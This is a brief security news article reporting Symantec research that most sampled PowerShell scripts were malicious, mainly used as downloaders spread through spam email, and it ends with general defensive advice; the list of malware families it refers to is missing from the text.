Microsoft’s PowerShell is Being Abused by Malware Authors

CISA's Patch by Tonight Emergency Directive

Microsoft Powershell, the software giant’s prominent scripting language that is now the default shell in the ever-popular Windows operating system is being used by cybercriminals to spread malware, security researchers have revealed.

Security firm Symantec has revealed that an analysis of scripts running Microsoft PowerShell saw a staggering 95.4 percent of the samples to be malicious. Malware authors are increasingly turning to the scripting language and shell platform, using its powerful flexibility to download their malware payloads, security researchers from Symantec confirmed.

PowerShell has been around for over a decade now, typically used by system administrators for daily management tasks. However, common cybercriminals and notorious larger groups are leveraging PowerShell too.

As the default shell framework, PowerShell makes for an attractive platform for malware authors to spread their malicious software. Most organizations are at risk, since they do not have extended logging enabled for the framework. Moreover, PowerShell scripts allow for payloads to be executed directly from system memory and they can also be easily obfuscated. Altogether, a favored attack tool, for cybercriminals.

Most malicious PowerShell scripts were used as downloaders, like Office macros, according to the cybersecurity firm’s researchers.

The most notable takeaways, such as the major prevailing malware families using PowerShell are:

All three of the above threats have seen their dispersal through spam emails, while Symantec added:

Over the last six months, we blocked an average of 466,028 emails with malicious JavaScript per day, and this trend is growing. Not all malicious JavaScript files use PowerShell to download files, but we have seen a steady increase in the framework’s usage.

As always, users are advised to update the latest version of PowerShell and keep their security software programs up-to-date with the latest updates and patches. Caution whilst opening attachment is recommended, especially when being presented with scripts or files from an untrusted source.

Image credit: Pixabay.